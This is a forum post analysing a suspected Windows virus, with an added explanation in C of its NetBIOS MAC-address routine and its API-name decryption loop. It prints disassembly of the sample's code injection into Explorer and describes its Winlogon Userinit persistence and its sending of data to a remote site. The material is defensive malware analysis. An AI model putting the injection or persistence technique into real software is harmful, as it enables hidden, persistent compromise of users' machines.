Tanmoy
August 19th, 2006, 07:22
Hi, I was analyzing one program and I came across a strange piece of code. I have no idea what it does; can someone tell me what it means?
NetBIOS unclear
Code:
00402260 /$ 81EC 40010000 SUB ESP,140 ; locals: NCB at [ESP+C], LANA_ENUM buffer at [ESP+4C]
00402266 |. 53 PUSH EBX
00402267 |. 56 PUSH ESI
00402268 |. 57 PUSH EDI
00402269 |. B9 10000000 MOV ECX,10
0040226E |. 33C0 XOR EAX,EAX
00402270 |. 8D7C24 0C LEA EDI,DWORD PTR SS:[ESP+C]
00402274 |. F3:AB REP STOS DWORD PTR ES:[EDI] ; zero 0x10 dwords = 0x40 bytes = sizeof(NCB)
00402276 |. 8D4C24 0C LEA ECX,DWORD PTR SS:[ESP+C] ; ECX = &ncb
0040227A |. 8D4424 4C LEA EAX,DWORD PTR SS:[ESP+4C] ; EAX = &lana_enum
0040227E |. 51 PUSH ECX ; arg: &ncb (after the push the NCB sits at [ESP+10])
0040227F |. C64424 10 37 MOV BYTE PTR SS:[ESP+10],37 ; ncb.ncb_command = NCBENUM (0x37)
00402284 |. 894424 14 MOV DWORD PTR SS:[ESP+14],EAX ; ncb.ncb_buffer = &lana_enum
00402288 |. 66:C74424 18 0001 MOV WORD PTR SS:[ESP+18],100 ; ncb.ncb_length = 0x100
0040228F |. E8 8C3B0000 CALL <JMP.&NETAPI32.Netbios> ; Netbios(&ncb): enumerate LAN adapter numbers
00402294 |. 8B5C24 4D MOV EBX,DWORD PTR SS:[ESP+4D] ; EBX = lana_enum.lana[0] (first adapter)
00402298 |. B9 10000000 MOV ECX,10
0040229D |. 33C0 XOR EAX,EAX
0040229F |. 8D7C24 0C LEA EDI,DWORD PTR SS:[ESP+C]
004022A3 |. 8D5424 0C LEA EDX,DWORD PTR SS:[ESP+C] ; EDX = &ncb
004022A7 |. 81E3 FF000000 AND EBX,0FF ; keep only the LANA byte
004022AD |. F3:AB REP STOS DWORD PTR ES:[EDI] ; zero the NCB again
004022AF |. 52 PUSH EDX ; arg: &ncb
004022B0 |. C64424 10 32 MOV BYTE PTR SS:[ESP+10],32 ; ncb.ncb_command = NCBRESET (0x32)
004022B5 |. 885C24 40 MOV BYTE PTR SS:[ESP+40],BL ; ncb.ncb_lana_num (NCB+0x30) = lana[0]
004022B9 |. E8 623B0000 CALL <JMP.&NETAPI32.Netbios> ; Netbios(&ncb): reset that adapter
004022BE |. B9 10000000 MOV ECX,10
004022C3 |. 33C0 XOR EAX,EAX
004022C5 |. 8D7C24 0C LEA EDI,DWORD PTR SS:[ESP+C]
004022C9 |. 8D5424 16 LEA EDX,DWORD PTR SS:[ESP+16] ; EDX = &ncb.ncb_callname (NCB+0x0A)
004022CD |. F3:AB REP STOS DWORD PTR ES:[EDI] ; zero the NCB a third time
004022CF |. BF C0C64000 MOV EDI,WinTask.0040C6C0 ; call-name string
004022D4 |. 83C9 FF OR ECX,FFFFFFFF
004022D7 |. F2:AE REPNE SCAS BYTE PTR ES:[EDI] ; inline strlen
004022D9 |. F7D1 NOT ECX ; ECX = strlen + 1
004022DB |. 2BF9 SUB EDI,ECX ; EDI back to start of string
004022DD |. C64424 0C 33 MOV BYTE PTR SS:[ESP+C],33 ; ncb.ncb_command = NCBASTAT (0x33)
004022E2 |. 8BC1 MOV EAX,ECX
004022E4 |. 8BF7 MOV ESI,EDI ; ESI = string
004022E6 |. 8BFA MOV EDI,EDX ; EDI = &ncb.ncb_callname
004022E8 |. 885C24 3C MOV BYTE PTR SS:[ESP+3C],BL ; ncb.ncb_lana_num (NCB+0x30) = lana[0]
004022EC |. C1E9 02 SHR ECX,2
004022EF |. F3:A5 REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS:[ESI] ; inline memcpy of the
004022F1 |. 8BC8 MOV ECX,EAX
004022F3 |. 83E1 03 AND ECX,3
004022F6 |. F3:A4 REP MOVS BYTE PTR ES:[EDI],BYTE PTR DS:[ESI] ; string (incl. NUL) into ncb_callname
004022F8 |. 8D4C24 0C LEA ECX,DWORD PTR SS:[ESP+C] ; ECX = &ncb
004022FC |. C74424 10 18F14000 MOV DWORD PTR SS:[ESP+10],WinTask.0040F118 ; ncb.ncb_buffer = global ADAPTER_STATUS at 0040F118
00402304 |. 51 PUSH ECX ; arg: &ncb
00402305 |. 66:C74424 18 5802 MOV WORD PTR SS:[ESP+18],258 ; ncb.ncb_length = 0x258
0040230C |. E8 0F3B0000 CALL <JMP.&NETAPI32.Netbios> ; Netbios(&ncb): adapter status query
00402311 |. A1 1CF14000 MOV EAX,DWORD PTR DS:[40F11C] ; ADAPTER_STATUS.adapter_address[4..7]
00402316 |. 33D2 XOR EDX,EDX
00402318 |. 8AD4 MOV DL,AH ; DL = adapter_address[5]
0040231A |. 25 FF000000 AND EAX,0FF ; EAX = adapter_address[4]
0040231F |. 52 PUSH EDX
00402320 |. 50 PUSH EAX
00402321 |. 33C0 XOR EAX,EAX
00402323 |. 33C9 XOR ECX,ECX
00402325 |. A0 1BF14000 MOV AL,BYTE PTR DS:[40F11B] ; adapter_address[3]
0040232A |. 8A0D 1AF14000 MOV CL,BYTE PTR DS:[40F11A] ; adapter_address[2]
00402330 |. 50 PUSH EAX
00402331 |. A1 18F14000 MOV EAX,DWORD PTR DS:[40F118] ; adapter_address[0..3]
00402336 |. 33D2 XOR EDX,EDX
00402338 |. 51 PUSH ECX
00402339 |. 8AD4 MOV DL,AH ; DL = adapter_address[1]
0040233B |. 25 FF000000 AND EAX,0FF ; EAX = adapter_address[0]
00402340 |. 52 PUSH EDX
00402341 |. 50 PUSH EAX
00402342 |. 8B8424 68010000 MOV EAX,DWORD PTR SS:[ESP+168] ; arg1 of this function = output buffer
00402349 |. 68 ECC74000 PUSH WinTask.0040C7EC ; ASCII "%02X-%02X-%02X-%02X-%02X-%02X"
0040234E |. 50 PUSH EAX
0040234F |. E8 233C0000 CALL WinTask.00405F77 ; sprintf(buf, fmt, b0, b1, b2, b3, b4, b5): MAC address as text
00402354 |. 83C4 20 ADD ESP,20 ; cdecl cleanup, 8 dword args
00402357 |. 5F POP EDI
00402358 |. 5E POP ESI
00402359 |. 5B POP EBX
0040235A |. 81C4 40010000 ADD ESP,140
00402360 \. C2 0800 RETN 8 ; stdcall, two args
I suspect it is a virus. It copies itself to the system32 directory, creates two copies by the names winkrnl.exe and dismgnt.exe, and creates a registry key in
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
Userinit=C:\WINDOWS\system32\userinit.exe,C:\WINDOWS\system32\DisMgnt.exe
It decrypts some API names; the code is:
String decryption routine
Code:
00402620 /$ 8B4424 08 MOV EAX,DWORD PTR SS:[ESP+8] ; outstring: buffer decoded in place (arg2)
00402624 |. 8B4C24 04 MOV ECX,DWORD PTR SS:[ESP+4] ; instring: key bytes (arg1)
00402628 |. 53 PUSH EBX
00402629 |. 56 PUSH ESI
0040262A |. BE 08000000 MOV ESI,8 ; number loop: 8 rounds x 2 bytes = 16 output bytes
0040262F |> 8A11 /MOV DL,BYTE PTR DS:[ECX] ; DL = key[0]
00402631 |. 8A18 |MOV BL,BYTE PTR DS:[EAX] ; BL = buf[0]
00402633 |. 2ADA |SUB BL,DL ; buf[0] -= key[0]
00402635 |. 83C1 04 |ADD ECX,4 ; key += 4
00402638 |. 8818 |MOV BYTE PTR DS:[EAX],BL
0040263A |. 8A51 FD |MOV DL,BYTE PTR DS:[ECX-3] ; DL = (old) key[1]
0040263D |. 8A58 01 |MOV BL,BYTE PTR DS:[EAX+1] ; BL = buf[1]
00402640 |. 83C0 02 |ADD EAX,2 ; buf += 2
00402643 |. 2ADA |SUB BL,DL ; buf[1] -= key[1]
00402645 |. 4E |DEC ESI
00402646 |. 8858 FF |MOV BYTE PTR DS:[EAX-1],BL
00402649 |.^ 75 E4 \JNZ SHORT WinTask.0040262F
0040264B |. 5E POP ESI
0040264C |. 5B POP EBX
0040264D \. C2 0800 RETN 8 ; stdcall, two args
It creates two mutexes, allocates memory in NTDLL and Explorer, and copies some code to the remote process.
Code:
00401417 |. 8B3D 3CB04000 MOV EDI,DWORD PTR DS:[<&KERNEL32.CreateMutexA>] ; EDI = CreateMutexA
0040141D |. 68 98C74000 PUSH WinTask.0040C798 ; /MutexName = "CMD"
00401422 |. 6A 00 PUSH 0 ; |InitialOwner = FALSE
00401424 |. 6A 00 PUSH 0 ; |pSecurity = NULL
00401426 |. FFD7 CALL NEAR EDI ; \CreateMutexA
00401428 |. 8B1D 38B04000 MOV EBX,DWORD PTR DS:[<&KERNEL32.GetLastError>] ; EBX = GetLastError
0040142E |. 8BF0 MOV ESI,EAX ; ESI = mutex handle
00401430 |. FFD3 CALL NEAR EBX ; GetLastError
00401432 |. 3D B7000000 CMP EAX,0B7 ; 0xB7 = ERROR_ALREADY_EXISTS
00401437 |. 56 PUSH ESI ; /hObject = mutex handle
00401438 |. 0F84 420C0000 JE WinTask.00402080 ; |another instance already owns "CMD": leave
0040143E |. FF15 34B04000 CALL NEAR DWORD PTR DS:[<&KERNEL32.CloseHandle>] ; \CloseHandle
00401444 |. 68 90C74000 PUSH WinTask.0040C790 ; /MutexName = "MAIN"
00401449 |. 6A 00 PUSH 0 ; |InitialOwner = FALSE
0040144B |. 6A 00 PUSH 0 ; |pSecurity = NULL
0040144D |. FFD7 CALL NEAR EDI ; \CreateMutexA
0040144F |. 894424 28 MOV DWORD PTR SS:[ESP+28],EAX ; save the "MAIN" handle
00401453 |. FFD3 CALL NEAR EBX ; GetLastError
00401455 |. 3D B7000000 CMP EAX,0B7 ; ERROR_ALREADY_EXISTS
0040145A |. 0F84 260C0000 JE WinTask.00402086
00401460 |. E8 3B0C0000 CALL WinTask.004020A0 ; ** AdjustToken **
00401465 |> 68 74C74000 /PUSH WinTask.0040C774 ; /Arg1 = 0040C774
0040146A |. E8 C10C0000 |CALL WinTask.00402130 ; \** HeapAlloc in ntdll ** (its return value is passed to OpenProcess as the PID)
0040146F |. 68 88130000 |PUSH 1388 ; /Timeout = 5000. ms
00401474 |. 8BF0 |MOV ESI,EAX ; |ESI = result of 00402130
00401476 |. FF15 58B04000 |CALL NEAR DWORD PTR DS:[<&KERNEL32.Sleep>] ; \Sleep
0040147C |. 85F6 |TEST ESI,ESI
0040147E |.^ 76 E5 \JBE SHORT WinTask.00401465 ; retry every 5 s until the result is non-zero
00401480 |. 56 PUSH ESI ; /ProcessId = ESI
00401481 |. 6A 00 PUSH 0 ; |Inheritable = FALSE
00401483 |. 68 FF0F1F00 PUSH 1F0FFF ; |Access = PROCESS_ALL_ACCESS
00401488 |. FF15 2CB04000 CALL NEAR DWORD PTR DS:[<&KERNEL32.OpenProcess>] ; \OpenProcess
0040148E |. 8BF8 MOV EDI,EAX ; EDI = hProcess
00401490 |. 85FF TEST EDI,EDI
00401492 |. 897C24 2C MOV DWORD PTR SS:[ESP+2C],EDI
00401496 |. 0F84 EA0B0000 JE WinTask.00402086
0040149C |. 6A 40 PUSH 40 ; /Protect = PAGE_EXECUTE_READWRITE
0040149E |. 68 00300000 PUSH 3000 ; |AllocationType = MEM_COMMIT|MEM_RESERVE
004014A3 |. 68 00000200 PUSH 20000 ; |Size = 0x20000 (131072.)
004014A8 |. 6A 00 PUSH 0 ; |Address = NULL
004014AA |. 57 PUSH EDI ; |hProcess
004014AB |. FF15 28B04000 CALL NEAR DWORD PTR DS:[<&KERNEL32.VirtualAllocEx>] ; \VirtualAllocEx
004014B1 |. 8BF0 MOV ESI,EAX ; ESI = base of the remote allocation
004014B3 |. 85F6 TEST ESI,ESI
004014B5 |. 897424 20 MOV DWORD PTR SS:[ESP+20],ESI
004014B9 |. 0F84 C70B0000 JE WinTask.00402086
004014BF |. 55 PUSH EBP
004014C0 |. 8D86 00F00000 LEA EAX,DWORD PTR DS:[ESI+F000] ; remote base+0xF000
004014C6 |. 8D8E 00400100 LEA ECX,DWORD PTR DS:[ESI+14000] ; remote base+0x14000
004014CC |. 6A 00 PUSH 0 ; /pOldProtect = NULL
004014CE |. 6A 40 PUSH 40 ; |NewProtect = PAGE_EXECUTE_READWRITE
004014D0 |. 894424 1C MOV DWORD PTR SS:[ESP+1C],EAX ; |
004014D4 |. 894C24 28 MOV DWORD PTR SS:[ESP+28],ECX ; |
004014D8 |. 68 00900100 PUSH 19000 ; |Size = 19000 (102400.)
004014DD |. 8DAE 00A00000 LEA EBP,DWORD PTR DS:[ESI+A000] ; |remote base+0xA000
004014E3 |. 8D96 00900100 LEA EDX,DWORD PTR DS:[ESI+19000] ; |remote base+0x19000
004014E9 |. 8D86 00E00100 LEA EAX,DWORD PTR DS:[ESI+1E000] ; |remote base+0x1E000
004014EF |. 8D8E 00F00100 LEA ECX,DWORD PTR DS:[ESI+1F000] ; |remote base+0x1F000
004014F5 |. 56 PUSH ESI ; |Address = remote base
004014F6 |. 57 PUSH EDI ; |hProcess
004014F7 |. 8D9E 00500000 LEA EBX,DWORD PTR DS:[ESI+5000] ; |EBX = remote base+0x5000
004014FD |. 896C24 2C MOV DWORD PTR SS:[ESP+2C],EBP ; |the base+N pointers are kept in locals
00401501 |. 895424 30 MOV DWORD PTR SS:[ESP+30],EDX ; |for later use
00401505 |. 894424 24 MOV DWORD PTR SS:[ESP+24],EAX ; |
00401509 |. 894C24 3C MOV DWORD PTR SS:[ESP+3C],ECX ; |
0040150D |. FF15 24B04000 CALL NEAR DWORD PTR DS:[<&KERNEL32.VirtualProtectEx>] ; \VirtualProtectEx
00401513 |. 6A 00 PUSH 0 ; /pBytesWritten = NULL
00401515 |. 68 00500000 PUSH 5000 ; |BytesToWrite = 5000 (20480.)
0040151A |. 68 902A4000 PUSH WinTask.00402A90 ; |Buffer = WinTask.00402A90 (first 0x5000-byte chunk of the payload)
0040151F |. 56 PUSH ESI ; |Address = remote base
00401520 |. 8B35 20B04000 MOV ESI,DWORD PTR DS:[<&KERNEL32.WriteProcessMemory>] ; |ESI = WriteProcessMemory
00401526 |. 57 PUSH EDI ; |hProcess
00401527 |. FFD6 CALL NEAR ESI ; \WriteProcessMemory
00401529 |. 85C0 TEST EAX,EAX
0040152B |. 0F84 2F0B0000 JE WinTask.00402060
00401531 |. 6A 00 PUSH 0 ; /pBytesWritten = NULL
00401533 |. 68 00500000 PUSH 5000 ; |BytesToWrite = 5000 (20480.)
00401538 |. 68 D03B4000 PUSH WinTask.00403BD0 ; |Buffer = WinTask.00403BD0 (second 0x5000-byte chunk)
0040153D |. 53 PUSH EBX ; |Address = remote base+0x5000
0040153E |. 57 PUSH EDI ; |hProcess
0040153F |. FFD6 CALL NEAR ESI ; \WriteProcessMemory
00401541 |. 85C0 TEST EAX,EAX
00401543 |. 0F84 170B0000 JE WinTask.00402060
And then it creates a remote thread and exits; it resides in memory for the rest of the period. If I try to delete it, it creates copies of itself again in the system directory. Removing the registry key is also not useful, because it writes the registry key again every 10 seconds, and it sends some data to www.luck4us.com.
The most amazing thing is that it is not detected by anti-virus programs. If someone wants to analyze it further, I can give it. To remove it I had to use a bert bootable CD. My question remains the same: what is the function of the NetBIOS code which I pasted at the beginning of my query?
Thanks and regards.
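The NetBIOS routine at 00402260, written out as an added example (this is not the poster's code and nothing here is recovered from the sample beyond what the listing shows). It models the 32-bit NCB layout the disassembly writes to, fills the three control blocks in the order the routine does (NCBENUM, NCBRESET, NCBASTAT) and runs the final formatting step over a constructed ADAPTER_STATUS buffer. The Netbios() call itself is Windows-only and is not made here; the "*" call name and the stack address 0x0012FF00 are assumptions, since the string at 0040C6C0 is not shown in the post.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Command codes the routine stores in ncb_command (values from nb30.h). */
#define NCBRESET  0x32
#define NCBASTAT  0x33
#define NCBENUM   0x37
#define NCBNAMSZ  16

/* 32-bit NCB layout. Pointer/handle fields are uint32_t so the offsets match the
 * x86 listing; this models the structure for reading the disassembly and is not
 * meant to be handed to netapi32 from a 64-bit build. */
#pragma pack(push, 1)
typedef struct {
    uint8_t  ncb_command;                    /* 0x00 */
    uint8_t  ncb_retcode, ncb_lsn, ncb_num;  /* 0x01..0x03 */
    uint32_t ncb_buffer;                     /* 0x04  PUCHAR on x86 */
    uint16_t ncb_length;                     /* 0x08 */
    uint8_t  ncb_callname[NCBNAMSZ];         /* 0x0A */
    uint8_t  ncb_name[NCBNAMSZ];             /* 0x1A */
    uint8_t  ncb_rto, ncb_sto;               /* 0x2A, 0x2B */
    uint32_t ncb_post;                       /* 0x2C  completion callback on x86 */
    uint8_t  ncb_lana_num, ncb_cmd_cplt;     /* 0x30, 0x31 */
    uint8_t  ncb_reserve[10];                /* 0x32 */
    uint32_t ncb_event;                      /* 0x3C  HANDLE on x86 */
} NCB_X86;                /* 0x40 bytes: the 0x10 dwords each REP STOS in the listing clears */
typedef struct {
    uint8_t length;                          /* 0x00 */
    uint8_t lana[254];                       /* 0x01: [ESP+4D] in the listing is lana[0] */
} LANA_ENUM_X86;
#pragma pack(pop)

/* 1 if the model agrees with the listing: once &ncb is pushed the NCB sits at
 * ESP+10, so [ESP+10]=command, [ESP+14]=buffer, [ESP+18]=length; NCB+0x30 is
 * lana_num and NCB+0x0A is callname. */
int ncb_layout_matches_listing(void)
{
    return sizeof(NCB_X86) == 0x40
        && offsetof(NCB_X86, ncb_buffer)   == 0x04
        && offsetof(NCB_X86, ncb_length)   == 0x08
        && offsetof(NCB_X86, ncb_callname) == 0x0A
        && offsetof(NCB_X86, ncb_lana_num) == 0x30
        && offsetof(LANA_ENUM_X86, lana)   == 0x01;
}

/* Zero the NCB (the REP STOS) and set only the fields the routine sets; a
 * callname is copied with its NUL, like the REP MOVS of strlen+1 bytes. */
void ncb_fill(NCB_X86 *n, uint8_t cmd, uint8_t lana, const char *callname,
              uint32_t buffer_va, uint16_t length)
{
    memset(n, 0, sizeof *n);
    n->ncb_command  = cmd;
    n->ncb_lana_num = lana;
    n->ncb_buffer   = buffer_va;
    n->ncb_length   = length;
    if (callname) {
        size_t len = strlen(callname) + 1;
        memcpy(n->ncb_callname, callname, len > NCBNAMSZ ? NCBNAMSZ : len);
    }
}

/* The three Netbios() control blocks in the order the routine builds them.
 * lana_enum_va stands for the stack buffer at ESP+4C; 0040F118/0x258 are the
 * ADAPTER_STATUS buffer and size from the listing; "*" is an assumption. */
void ncb_sequence(NCB_X86 *n, uint32_t lana_enum_va, uint8_t lana)
{
    ncb_fill(n, NCBENUM,  0,    NULL, lana_enum_va, 0x100);   /* 00402276-0040228F */
    ncb_fill(n, NCBRESET, lana, NULL, 0,            0);       /* 00402294-004022B9 */
    ncb_fill(n, NCBASTAT, lana, "*",  0x0040F118u,  0x258);   /* 004022BE-0040230C */
}

/* Raw-byte view of the final NCBASTAT block, i.e. what a dump of the NCB would
 * show (little-endian, as on x86). */
int astat_ncb_bytes_ok(uint8_t lana)
{
    NCB_X86 n;
    const uint8_t *raw = (const uint8_t *)&n;
    ncb_sequence(&n, 0x0012FF00u /* hypothetical stack address */, lana);
    return raw[0x00] == NCBASTAT && raw[0x30] == lana && raw[0x0A] == '*'
        && raw[0x08] == 0x58 && raw[0x09] == 0x02                      /* 0x0258 */
        && raw[0x04] == 0x18 && raw[0x05] == 0xF1 && raw[0x06] == 0x40 && raw[0x07] == 0x00;
}

/* 00402311-0040234F: ADAPTER_STATUS begins with adapter_address[6]; the routine
 * reads those six bytes and formats them with the "%02X-..." string at 0040C7EC. */
const char *adapter_address_string(const uint8_t *adapter_status)
{
    static char mac[18];
    snprintf(mac, sizeof mac, "%02X-%02X-%02X-%02X-%02X-%02X",
             adapter_status[0], adapter_status[1], adapter_status[2],
             adapter_status[3], adapter_status[4], adapter_status[5]);
    return mac;
}

/* Constructed stand-in for the buffer NCBASTAT fills; only the first six bytes matter. */
const uint8_t SAMPLE_ADAPTER_STATUS[0x258] = { 0x00, 0x0C, 0x29, 0xAB, 0xCD, 0xEF };

int main(void)
{
    printf("layout ok: %d, astat bytes ok: %d, adapter address: %s\n",
           ncb_layout_matches_listing(), astat_ncb_bytes_ok(0),
           adapter_address_string(SAMPLE_ADAPTER_STATUS));
    return 0;
}
```

So the routine is the classic NetBIOS way of reading the MAC address of the first LAN adapter: enumerate LANAs, reset the first one, ask for its adapter status, and format the six leading bytes of the reply. The sample is very likely using the result as a machine identifier; that part is not visible in the listing.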
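The string decryption routine at 00402620, as an added example in C (not the poster's code; the key and ciphertext are constructed here for illustration and were not recovered from the sample). The loop subtracts key bytes from the buffer in place, but the two pointers advance at different strides, so only bytes 0 and 1 of every 4-byte key group are used and exactly 16 output bytes are touched.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* The loop at 0040262F runs 8 times; each pass subtracts two key bytes from two
 * buffer bytes in place, then advances the key pointer by 4 and the buffer
 * pointer by 2.  So buf[2k] -= key[4k] and buf[2k+1] -= key[4k+1] for k = 0..7. */
#define DEC_ROUNDS 8
#define DEC_BUFLEN (DEC_ROUNDS * 2)   /* 16 bytes decoded in place */
#define DEC_KEYLEN (DEC_ROUNDS * 4)   /* 32 key bytes, half of them never read */

void decrypt_name(uint8_t *buf, const uint8_t *key)
{
    for (int k = 0; k < DEC_ROUNDS; k++) {
        buf[0] = (uint8_t)(buf[0] - key[0]);   /* MOV DL,[ECX] / SUB BL,DL / MOV [EAX],BL */
        buf[1] = (uint8_t)(buf[1] - key[1]);   /* MOV DL,[ECX-3] after ADD ECX,4 */
        key += 4;                               /* ADD ECX,4 */
        buf += 2;                               /* ADD EAX,2 */
    }
}

/* Inverse of the loop above; used only to build test vectors, the post shows
 * no encoder in the sample. */
void encrypt_name(uint8_t *buf, const uint8_t *key)
{
    for (int k = 0; k < DEC_ROUNDS; k++) {
        buf[0] = (uint8_t)(buf[0] + key[0]);
        buf[1] = (uint8_t)(buf[1] + key[1]);
        key += 4;
        buf += 2;
    }
}

/* Constructed key: bytes 0 and 1 of each group are the ones the loop reads,
 * the 0xFF fillers are never touched. */
const uint8_t SAMPLE_KEY[DEC_KEYLEN] = {
    0x11, 0x22, 0xFF, 0xFF,  0x11, 0x22, 0xFF, 0xFF,  0x11, 0x22, 0xFF, 0xFF,  0x11, 0x22, 0xFF, 0xFF,
    0x11, 0x22, 0xFF, 0xFF,  0x11, 0x22, 0xFF, 0xFF,  0x11, 0x22, 0xFF, 0xFF,  0x11, 0x22, 0xFF, 0xFF,
};

/* Constructed ciphertext: "OpenProcess" padded with NULs, encoded with SAMPLE_KEY. */
const uint8_t SAMPLE_CIPHER[DEC_BUFLEN] = {
    0x60, 0x92, 0x76, 0x90, 0x61, 0x94, 0x80, 0x85,
    0x76, 0x95, 0x84, 0x22, 0x11, 0x22, 0x11, 0x22,
};

/* Decode a 16-byte blob into a NUL-terminated string (out needs 17 bytes);
 * returns the decoded string length. */
size_t decrypt_blob(const uint8_t *cipher, const uint8_t *key, char *out)
{
    uint8_t buf[DEC_BUFLEN];
    memcpy(buf, cipher, DEC_BUFLEN);
    decrypt_name(buf, key);
    memcpy(out, buf, DEC_BUFLEN);
    out[DEC_BUFLEN] = '\0';
    return strlen(out);
}

const char *decrypt_sample(void)
{
    static char out[DEC_BUFLEN + 1];
    decrypt_blob(SAMPLE_CIPHER, SAMPLE_KEY, out);
    return out;
}

/* Any API name of at most 15 characters survives encode -> decode with this
 * key; longer names cannot be carried by this routine, which touches 16 bytes. */
int roundtrip_ok(const char *name)
{
    uint8_t buf[DEC_BUFLEN] = { 0 };
    size_t n = strlen(name);
    if (n >= DEC_BUFLEN) return 0;
    memcpy(buf, name, n);
    encrypt_name(buf, SAMPLE_KEY);
    decrypt_name(buf, SAMPLE_KEY);
    return memcmp(buf, name, n + 1) == 0;
}

int main(void)
{
    printf("decoded: %s (roundtrip of a 15-char name: %d)\n",
           decrypt_sample(), roundtrip_ok("WriteProcessMem"));
    return 0;
}
```

When you set a breakpoint on 0040264D in the debugger, the buffer passed in [ESP+8] holds the decoded name, which is the easy way to recover the full API list without reimplementing anything; the C version is useful when you want to decode the string table statically from the dumped key and ciphertext blobs.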